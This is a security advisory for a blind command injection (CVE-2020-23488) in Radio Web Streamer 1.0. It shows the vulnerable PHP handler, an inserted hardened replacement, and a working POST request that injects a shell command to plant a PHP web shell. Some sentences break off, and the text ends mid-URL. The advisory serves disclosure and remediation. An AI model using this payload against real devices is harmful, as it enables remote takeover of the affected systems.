L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection
Title | L.E.F. srl – Radio Web Streamer – v1.0 – Blind Command Injection |
Discovery date | 29/05/2020 |
Release date | 25/02/2021 |
Credits | Francesco Marano |
Affected products | Radio Web Streamer, version 1.0 |
Class | Parameter Injection, Command Injection, Remote Command Execution |
Disclosure timeline
29/05/2020 | Request for CVE ID |
27/06/2020 | Additional info sent to MITRE |
25/02/2021 | CVE-2020-23488 released |
Vulnerability details
Blind Command Injection in L.E.F. srl Radio Web Streamer 1.0 allows an authenticated attacker to execute arbitrary commands on the target system via a specially crafted HTTP POST request. No command output is returned to the attacker.
The /api/volumeAudioHandler/setVolume.php endpoint sets the audio volume using the following excerpt of PHP code:
<?php
// The volume value is read straight from the JSON request body
$data = json_decode(file_get_contents("php://input"),1);
$vol = $data['data'];
// $vol is concatenated into a shell command with no validation or escaping
$command="sudo -u root /usr/bin/amixer set PCM ".$vol."%";
exec( $command,$output,$retval);
// Only the exit code influences the response; command output is discarded
$response["res"]=false;
$response["msg"]="Operazione fallita. Riprovare";
if ($retval==0){
$response["res"]=true;
$response["msg"]="Operazione avvenuta con successo";
}
echo json_encode($response);
As you can see, the $vol parameter comes unsanitized from user input and is used in a call to exec(). Based on the command's return code, the response message is "Operazione avvenuta con successo" if the code is zero and "Operazione fallita. Riprovare" otherwise.
Since the user input is not escaped, an attacker can concatenate OS commands by using a payload like 100%; <command> #. This results in the execution of the following command:
sudo -u root /usr/bin/amixer set PCM 100%; <command> #%
The audio volume is correctly set to 100%, then
Since the attacker cannot see the command output, only its return code, this vulnerability can be used to blindly write a web shell on the target machine and then run commands with their output.
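A hardened replacement for the handler, added here as an example and not the vendor's code (the function name buildVolumeCommand is my own): the volume is allow-listed as an integer between 0 and 100 before anything derived from the request reaches exec(), and the response stays generic for both invalid input and a failed command.

```php
<?php
// Added example (not the vendor's code): hardened version of the
// setVolume.php handler. buildVolumeCommand() is a name chosen here.

/**
 * Validate the requested volume and build the amixer command.
 * Returns null when the input is not an integer in 0..100, so the
 * shell command is only ever built from a known-good value.
 */
function buildVolumeCommand($requested): ?string
{
    // Allow-list: plain integer in range. Strings such as "100%; id #"
    // or "50abc" are rejected; "100" and 100 are accepted.
    $vol = filter_var($requested, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => 100],
    ]);
    if ($vol === false) {
        return null;
    }
    // $vol is an int now; escapeshellarg() is belt and braces in case
    // the allow-list above is ever loosened.
    return 'sudo -u root /usr/bin/amixer set PCM ' . escapeshellarg($vol . '%');
}

$data = json_decode(file_get_contents('php://input'), true);
$response = ['res' => false, 'msg' => 'Operazione fallita. Riprovare'];

$command = buildVolumeCommand($data['data'] ?? null);
if ($command !== null) {
    exec($command, $output, $retval);
    if ($retval === 0) {
        $response = ['res' => true, 'msg' => 'Operazione avvenuta con successo'];
    }
}
// Same message for rejected input and for a failed command, so the
// response does not reveal which check stopped the request.
header('Content-Type: application/json');
echo json_encode($response);
```

Restricting the sudoers entry to exactly this amixer invocation would further limit what any future bug in the handler could reach.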
A malicious HTTP POST request to create a web shell is:
POST /api/volumeAudioHandler/setVolume.php HTTP/1.1
Host: <target>
Referer: http://<target>/(homeRouter:streamConfigurator)
Content-Type: application/json; charset=utf-8
Authorization: Bearer *REDACTED*
Content-Length: 74
{"data":"100%; echo '<?php system($_GET[\"c\"]); ?>' > /var/www/html/backdoor.php #"}
If the response contains the "Operazione avvenuta con successo" string, the attacker can run arbitrary commands on the target machine, with output, simply by sending HTTP GET requests from a browser to the following link:
http:///backdoor.php?c=
where